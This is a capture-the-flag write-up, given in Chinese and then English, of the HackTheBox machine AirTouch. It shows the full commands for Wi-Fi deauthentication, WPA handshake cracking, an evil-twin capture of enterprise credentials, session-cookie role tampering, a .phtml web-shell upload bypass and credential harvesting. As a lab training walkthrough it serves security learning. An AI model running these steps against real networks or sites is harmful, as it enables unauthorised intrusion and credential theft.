HackTheBox Airtouch Writeup

HackTheBox Airtouch 是一台中等难度的 Linux 机器。本文按照信息收集、初始访问、横向或提权路径的顺序整理完整解题过程,突出关键漏洞点、凭据来源与最终拿到 user/root 或域权限的利用链。

htb airtouch

Information Gathering

进行TCP扫描只有22端口开放

进行UDP扫描:sudo nmap -sU --top-ports 100 -sV 10.129.244.98

PORT    STATE         SERVICE VERSION
68/udp  open|filtered dhcpc
161/udp open          snmp    SNMPv1 server; net-snmp SNMPv3 server (public)

Vulnerability Analysis

➜  AirTouch snmp-check 10.129.244.98
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.129.244.98:161 using SNMPv1 and community 'public'

[*] System information:

  Host IP address               : 10.129.244.98
  Hostname                      : Consultant
  Description                   : "The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it after use it)"
  Contact                       : admin@AirTouch.htb
  Location                      : "Consultant pc"
  Uptime snmp                   : 00:31:29.75
  Uptime system                 : 00:30:26.28
  System date                   : -

使用consultant连接到目标

ssh consultant@10.129.244.98
# 输入密码RxBlZhLmOkacNWScmZ6D

进入后查看网络(ip a)发现有几个网卡wlan0~wlan6

并在主文件夹中发现diagram-net.png文件

查看该图片

image 133.png

可以看到我们处在黄色区域,我们的目标是到达绿色企业网络中

Exploitation (User Flag)

启用wifi监听模式

sudo airmon-ng start wlan0

命令执行后:

接口改名: 原本的网卡 wlan0 消失了,取而代之的是 wlan0mon(mon 代表 monitor)。

  • 注意:以后您执行命令时,都要用 wlan0mon 这个新名字,而不是 wlan0

sudo airmon-ng start wlan0 = “把我的 0 号无线网卡变成监听模式,准备开始抓包。”

开始监听

sudo airodump-ng wlan0mon

sudo airodump-ng wlan0mon = “用我的监听网卡,扫描周围所有的 Wi-Fi 信号,并把详细信息列出来。”

image 134.png

BSSID是mac地址 CH是信道

抓包

# 解释:
# -c 6       : 只监听 6 号信道 (不再乱跳)
# --bssid ...: 只过滤目标路由器的 MAC 地址 (屏蔽无关噪音)
# -w capture : 将抓到的数据包保存为文件,文件名前缀叫 capture
# wlan0mon   : 您的监听网卡

sudo airodump-ng -c 6 --bssid F0:9F:C2:A3:F1:A7 -w capture wlan0mon

发现F0:9F:C2:A3:F1:A7 28:6C:07:FE:A3:22 -29 54 -54 0 62 AirTouch-Internet

将其踢掉线让其重新输入WiFi密码

# -0 10       : 发送 10 次攻击包 (不够可以加到 20 或 50)
# -a [BSSID]  : 路由器的 MAC 地址
# -c [STATION]: 客户端/受害者的 MAC 地址 (请替换下面的问号)
# wlan0mon    : 您的网卡名

sudo aireplay-ng -0 10 -a F0:9F:C2:A3:F1:A7 -c 28:6C:07:FE:A3:22 wlan0mon

这时在第一个窗口看到WPA handshake: F0:9F:C2:A3:F1:A7时证明拿到了破解密码所需的全部数据

破解密码

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

得到challenge(Tablets vlan的wifi密码)

生成连接配置文件

wpa_passphrase AirTouch-Internet challenge > wpa_internet.conf
echo "p2p_disabled=1" >> wpa_internet.conf

使用 wpa_supplicant 加载刚才的配置文件,通过 wlan1 网卡连接。

# -B: 在后台运行 (Background)
# -i: 指定网卡 (Interface)
# -c: 指定配置文件 (Config)
sudo wpa_supplicant -B -i wlan1 -c wpa_internet.conf

向路由器申请IP地址

sudo dhclient wlan1

扫描存活主机

# 扫描 192.168.3.x 网段的所有主机
for i in {1..254}; do ping -c 1 -W 1 192.168.3.$i > /dev/null 2>&1 & done; wait; echo "扫描结束,请查看 ARP 表"
# 查看arp表
ip neigh

192.168.3.1 dev wlan1 lladdr f0:9f:c2:a3:f1:a7 STALE

查看192.168.3.1有没有开放端口

# 设置要扫描的目标 IP
target="192.168.3.1"

echo "正在扫描 $target ..."
# 扫描常用的前 1000 个端口 (可以修改 {1..1000} 为 {1..65535})
for port in {20..1000}; do
  # 利用 /dev/tcp 特性尝试连接,不输出错误信息
  (echo > /dev/tcp/$target/$port) >/dev/null 2>&1 && echo "🔓 发现开放端口: $port" &
done; wait
echo "扫描完成。"

保存在一个文件中

consultant@AirTouch-Consultant:~$ bash scan.sh
正在扫描 192.168.3.1 ...
🔓 发现开放端口: 22
🔓 发现开放端口: 53
🔓 发现开放端口: 80

转发80端口

sshpass -p 'RxBlZhLmOkacNWScmZ6D' ssh -L 8080:192.168.3.1:80 consultant@10.129.244.98

打开后是一个登陆界面


在 Wireshark 里解密流量

搜素eapol

配置 Wireshark 来自动解密这个 Wi-Fi 的所有流量(前提是抓到了握手包):

  1. 在 Wireshark 菜单栏:Edit (编辑) -> Preferences (首选项)
  2. 展开 Protocols (协议) -> 找到 IEEE 802.11
  3. 点击 Decryption keys (解密密钥) 旁边的 Edit (编辑)
  4. 添加一条新记录:
    • Key type: wpa-pwd
    • Key: challenge:AirTouch-Internet (格式是 密码:SSID)
  5. 点击 OK。

然后搜索http.cookie可以发现PHPSESSID=2h7gtgfa6q8dsk5gev2eir8473; UserRole=user

利用此cookie并把UserRole改为admin即可绕过登录


登陆后是一个可以上传文件的界面

上传php得到:Sorry, PHP and HTML files are not allowed.Sorry, your file was not uploaded.

通过更改文件名字为shell.phtml即可绕过此登陆界面


我们使用此webphp,上传后查看login.php得到密码JunDRDZKHDnpkpDDvay和2wLFYNh4TSTgA5sNgT4

if (isset($_POST['Submit'])) {
  /* Define username, associated password, and user attribute array */
  $logins = array(
    /*'user' => array('password' => 'JunDRDZKHDnpkpDDvay', 'role' => 'admin'),*/
    'manager' => array('password' => '2wLFYNh4TSTgA5sNgT4', 'role' => 'user')
  );
ssh user@192.168.3.1
# 输入密码JunDRDZKHDnpkpDDvay

即可进入user,sudo -l 依然是all

升级权限后在root文件夹中得到user.txt以及send_certs.txt

root@AirTouch-AP-PSK:~# cat send_certs.sh
#!/bin/bash

# DO NOT COPY
# Script to sync certs-backup folder to AirTouch-office.

# Define variables
REMOTE_USER="remote"
REMOTE_PASSWORD="xGgWEwqUpfoOVsLeROeG"
REMOTE_PATH="~/certs-backup/"
LOCAL_FOLDER="/root/certs-backup/"

# Use sshpass to send the folder via SCP
sshpass -p "$REMOTE_PASSWORD" scp -r "$LOCAL_FOLDER" "$REMOTE_USER@10.10.10.1:$REMOTE_PATH"

Privilege Escalation (Root Flag)

/root中发现了一个名为 send_certs.sh 的脚本。该脚本会自动将证书备份到网络中的下一跳:AirTouch-Office 网关 ( 10.10.10.1 )。该脚本包含名为 remote 的用户的明文凭据。

我们已到达企业 VLAN ( 10.10.10.0/24 ) 的边缘。WiFi 网络 AirTouch-Office 使用 WPA2-Enterprise (802.1X) 加密。与家庭/PSK 网络不同,该网络使用 RADIUS 服务器对单个用户进行身份验证,通常通过用户名和密码 (PEAP-MSCHAPv2) 进行验证。

你不能用破解预共享密钥(PSK)的方式来“破解”WPA2-Enterprise 数据包。相反,我们必须执行邪恶双胞胎攻击。

监听5GHz以窃取AirTouch-Office

consultant@AirTouch-Consultant:~$ sudo airodump-ng --band a wlan0mon
 CH 108 ][ Elapsed: 24 s ][ 2026-01-25 17:11

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 AC:8B:A9:AA:3F:D2  -28       15        1    0  44   54e  WPA2 CCMP   MGT  AirTouch-Office
 AC:8B:A9:F3:A1:13  -28       15        1    0  44   54e  WPA2 CCMP   MGT  AirTouch-Office
 52:49:1E:8E:B7:5F  -28      280        0    0   1   54        TKIP   PSK  vodafoneFB6N

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 (not associated)   28:6C:07:12:EE:A1  -29    0 - 1      0        2         AirTouch-Office
 AC:8B:A9:F3:A1:13  C8:8A:9A:6F:F9:D2  -29    0 - 6e   460        7         AccessLink,AirTouch-Office

使用工具eaphammer进行邪恶双胞胎攻击

# 假设您的网卡是 wlan4 (请根据实际情况修改 -i 参数)
sudo ./eaphammer -i wlan4 \
    --essid AirTouch-Office \
    --creds \
    --server-cert server.crt \
    --private-key server.key \
    --ca-cert ca.crt \
    --auth wpa-eap \
    --channel 44

重新开一个终端将网卡固定在44频道

sudo airodump-ng -c 44 wlan0mon

尝试踢掉用户

# 语法:sudo aireplay-ng -0 [攻击次数] -a [真实AP的MAC] -c [受害者MAC] [接口]
sudo aireplay-ng -0 10 -a AC:8B:A9:AA:3F:D2 -c [] wlan0mon
# 或者广播攻击(暴力容易被发现)
sudo aireplay-ng -0 10 -a AC:8B:A9:AA:3F:D2 wlan0mon

得到jtr NETNTLM: r4ulcl:NETNTLMNETNTLMa4c27aa6b39622a3$9f984f937bb10edd63e22f25bcb9af3b545b5843631392d2

破解r4ulcl:laboratory

配置网络

network={
    ssid="AirTouch-Office"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="AirTouch\r4ulcl"
    password="laboratory"
    phase2="auth=MSCHAPV2"
}

sudo wpa_supplicant -i wlan3 -c wpa.conf -B连接网络

sudo dhclient wlan3申请ip

连接remote

ssh remote@10.10.10.1
# 密码xGgWEwqUpfoOVsLeROeG

查看进程ps -ef

root          46      28  0 17:06 ?        00:00:09 hostapd_aps /root/mgt/hostapd_wpe.conf
root          47      28  0 17:06 ?        00:00:09 hostapd_aps /root/mgt/hostapd_wpe2.conf

最后在/etc/hostapd/hostapd_wpe.eap_user

得到admin:xMJpzXt4D9ouMuL3JJsMriF7KZozm7

最后sudo su


Lessons Learned

HTB airtouch

Information Gathering

Conducting a TCP scan only reveals port 22 as open.

Conducting a UDP scan: sudo nmap -sU --top-ports 100 -sV 10.129.244.98

PORT    STATE         SERVICE VERSION
68/udp  open|filtered dhcpc
161/udp open          snmp    SNMPv1 server; net-snmp SNMPv3 server (public)

Vulnerability Analysis

➜  AirTouch snmp-check 10.129.244.98
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.129.244.98:161 using SNMPv1 and community 'public'

[*] System information:

  Host IP address               : 10.129.244.98
  Hostname                      : Consultant
  Description                   : "The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it after use it)"
  Contact                       : admin@AirTouch.htb
  Location                      : "Consultant pc"
  Uptime snmp                   : 00:31:29.75
  Uptime system                 : 00:30:26.28
  System date                   : -

Connect to the target using the consultant account.

ssh consultant@10.129.244.98
# Enter the password RxBlZhLmOkacNWScmZ6D

After logging in, checking the network (ip a) reveals several network interfaces from wlan0 to wlan6.

A file named diagram-net.png is also found in the home directory.

Viewing the image

image 133.png

We can see that we are in the yellow zone, and our objective is to reach the green corporate network.

Exploitation (User Flag)

Enable WiFi monitoring mode

sudo airmon-ng start wlan0

After executing the command:

Interface renamed: The original network card wlan0 disappears and is replaced by wlan0mon (mon stands for monitor).

  • Note: From now on, use the new name wlan0mon for all commands, not wlan0.

sudo airmon-ng start wlan0 = “Put my wireless card number 0 into monitoring mode, ready to start packet capture.”

Start monitoring

sudo airodump-ng wlan0mon

sudo airodump-ng wlan0mon = “Use my monitoring card to scan all surrounding Wi-Fi signals and list detailed information.”

image 134.png

BSSID is the MAC address, CH is the channel

Capture packets

# Explanation:
# -c 6       : Only monitor channel 6 (no more random hopping)
# --bssid ...: Only filter for the target router's MAC address (block irrelevant noise)
# -w capture : Save captured packets to files with the prefix 'capture'
# wlan0mon   : Your monitoring card

sudo airodump-ng -c 6 --bssid F0:9F:C2:A3:F1:A7 -w capture wlan0mon

Found F0:9F:C2:A3:F1:A7 28:6C:07:FE:A3:22 -29 54 -54 0 62 AirTouch-Internet

Kick it offline to force it to re-enter the WiFi password

# -0 10       : Send 10 attack packets (increase to 20 or 50 if needed)
# -a [BSSID]  : Router's MAC address
# -c [STATION]: Client/victim's MAC address (replace the question mark below)
# wlan0mon    : Your card name

sudo aireplay-ng -0 10 -a F0:9F:C2:A3:F1:A7 -c 28:6C:07:FE:A3:22 wlan0mon

At this point, seeing WPA handshake: F0:9F:C2:A3:F1:A7 in the first window means all data needed for password cracking has been captured

Crack the password

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

Obtain challenge (the WiFi password for Tablets vlan)

Generate connection configuration file

wpa_passphrase AirTouch-Internet challenge > wpa_internet.conf
echo "p2p_disabled=1" >> wpa_internet.conf

Use wpa_supplicant to load the configuration file just created and connect via the wlan1 card.

# -B: Run in background
# -i: Specify interface
# -c: Specify configuration file
sudo wpa_supplicant -B -i wlan1 -c wpa_internet.conf

Request an IP address from the router

sudo dhclient wlan1

Scan for live hosts

# Scan all hosts in the 192.168.3.x subnet
for i in {1..254}; do ping -c 1 -W 1 192.168.3.$i > /dev/null 2>&1 & done; wait; echo "Scan complete, check ARP table"
# View ARP table
ip neigh

192.168.3.1 dev wlan1 lladdr f0:9f:c2:a3:f1:a7 STALE

Check if 192.168.3.1 has open ports

# Set target IP to scan
target="192.168.3.1"

echo "Scanning $target ..."
# Scan the first 1000 common ports (change {1..1000} to {1..65535} if needed)
for port in {20..1000}; do
  # Use /dev/tcp feature to attempt connection, suppress error output
  (echo > /dev/tcp/$target/$port) >/dev/null 2>&1 && echo "🔓 Open port found: $port" &
done; wait
echo "Scan complete."

Save to a file

consultant@AirTouch-Consultant:~$ bash scan.sh
Scanning 192.168.3.1 ...
🔓 Open port found: 22
🔓 Open port found: 53
🔓 Open port found: 80

Forward port 80

sshpass -p 'RxBlZhLmOkacNWScmZ6D' ssh -L 8080:192.168.3.1:80 consultant@10.129.244.98

Opening it reveals a login interface


Decrypting traffic in Wireshark

Search for eapol

Configure Wireshark to automatically decrypt all traffic for this Wi-Fi (requires captured handshake):

  1. In the Wireshark menu bar: Edit -> Preferences.
  2. Expand Protocols -> find IEEE 802.11.
  3. Click Edit next to Decryption keys.
  4. Add a new entry:
    • Key type: wpa-pwd
    • Key: challenge:AirTouch-Internet (format is password:SSID)
  5. Click OK.

Then search for http.cookie to find PHPSESSID=2h7gtgfa6q8dsk5gev2eir8473; UserRole=user

Using this cookie and changing UserRole to admin allows bypassing login


After logging in, there is a file upload interface

Uploading PHP gives: Sorry, PHP and HTML files are not allowed. Sorry, your file was not uploaded.

Bypassing this restriction by changing the filename to shell.phtml


We use this webphp, after uploading and viewing login.php, we obtain the passwords JunDRDZKHDnpkpDDvay and 2wLFYNh4TSTgA5sNgT4

if (isset($_POST['Submit'])) {
  /* Define username, associated password, and user attribute array */
  $logins = array(
    /*'user' => array('password' => 'JunDRDZKHDnpkpDDvay', 'role' => 'admin'),*/
    'manager' => array('password' => '2wLFYNh4TSTgA5sNgT4', 'role' => 'user')
  );
ssh user@192.168.3.1
# Enter password JunDRDZKHDnpkpDDvay

This allows entry as user, sudo -l still shows all

After privilege escalation, obtain user.txt and send_certs.txt from the root folder

root@AirTouch-AP-PSK:~# cat send_certs.sh
#!/bin/bash

# DO NOT COPY
# Script to sync certs-backup folder to AirTouch-office.

# Define variables
REMOTE_USER="remote"
REMOTE_PASSWORD="xGgWEwqUpfoOVsLeROeG"
REMOTE_PATH="~/certs-backup/"
LOCAL_FOLDER="/root/certs-backup/"

# Use sshpass to send the folder via SCP
sshpass -p "$REMOTE_PASSWORD" scp -r "$LOCAL_FOLDER" "$REMOTE_USER@10.10.10.1:$REMOTE_PATH"

Privilege Escalation (Root Flag)

A script named send_certs.sh was found in /root. This script automatically backs up certificates to the next hop in the network: the AirTouch-Office gateway (10.10.10.1). The script contains plaintext credentials for a user named remote.

We have reached the edge of the corporate VLAN (10.10.10.0/24). The WiFi network AirTouch-Office uses WPA2-Enterprise (802.1X) encryption. Unlike home/PSK networks, this network uses a RADIUS server to authenticate individual users, typically via username and password (PEAP-MSCHAPv2).

You cannot “crack” WPA2-Enterprise packets in the way you would crack a pre-shared key (PSK). Instead, we must perform an Evil Twin attack.

Listen on 5GHz to capture AirTouch-Office

consultant@AirTouch-Consultant:~$ sudo airodump-ng --band a wlan0mon
 CH 108 ][ Elapsed: 24 s ][ 2026-01-25 17:11

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 AC:8B:A9:AA:3F:D2  -28       15        1    0  44   54e  WPA2 CCMP   MGT  AirTouch-Office
 AC:8B:A9:F3:A1:13  -28       15        1    0  44   54e  WPA2 CCMP   MGT  AirTouch-Office
 52:49:1E:8E:B7:5F  -28      280        0    0   1   54        TKIP   PSK  vodafoneFB6N

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 (not associated)   28:6C:07:12:EE:A1  -29    0 - 1      0        2         AirTouch-Office
 AC:8B:A9:F3:A1:13  C8:8A:9A:6F:F9:D2  -29    0 - 6e   460        7         AccessLink,AirTouch-Office

Use the tool eaphammer for the Evil Twin attack

# Assuming your network card is wlan4 (modify the -i parameter according to your actual situation)
sudo ./eaphammer -i wlan4 \
    --essid AirTouch-Office \
    --creds \
    --server-cert server.crt \
    --private-key server.key \
    --ca-cert ca.crt \
    --auth wpa-eap \
    --channel 44

Open a new terminal and fix the network card to channel 44

sudo airodump-ng -c 44 wlan0mon

Attempt to deauthenticate the user

# Syntax: sudo aireplay-ng -0 [number of attacks] -a [MAC of the real AP] -c [victim MAC] [interface]
sudo aireplay-ng -0 10 -a AC:8B:A9:AA:3F:D2 -c [] wlan0mon
# Or broadcast attack (aggressive and easily detectable)
sudo aireplay-ng -0 10 -a AC:8B:A9:AA:3F:D2 wlan0mon

Obtained jtr NETNTLM: r4ulcl:NETNTLMNETNTLMa4c27aa6b39622a3$9f984f937bb10edd63e22f25bcb9af3b545b5843631392d2

Cracked r4ulcl:laboratory

Configure the network

network={
    ssid="AirTouch-Office"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="AirTouch\r4ulcl"
    password="laboratory"
    phase2="auth=MSCHAPV2"
}

sudo wpa_supplicant -i wlan3 -c wpa.conf -B to connect to the network

sudo dhclient wlan3 to request an IP

Connect as remote

ssh remote@10.10.10.1
# Password xGgWEwqUpfoOVsLeROeG

Check processes ps -ef

root          46      28  0 17:06 ?        00:00:09 hostapd_aps /root/mgt/hostapd_wpe.conf
root          47      28  0 17:06 ?        00:00:09 hostapd_aps /root/mgt/hostapd_wpe2.conf

Finally, in /etc/hostapd/hostapd_wpe.eap_user

Found admin:xMJpzXt4D9ouMuL3JJsMriF7KZozm7

Finally sudo su


Lessons Learned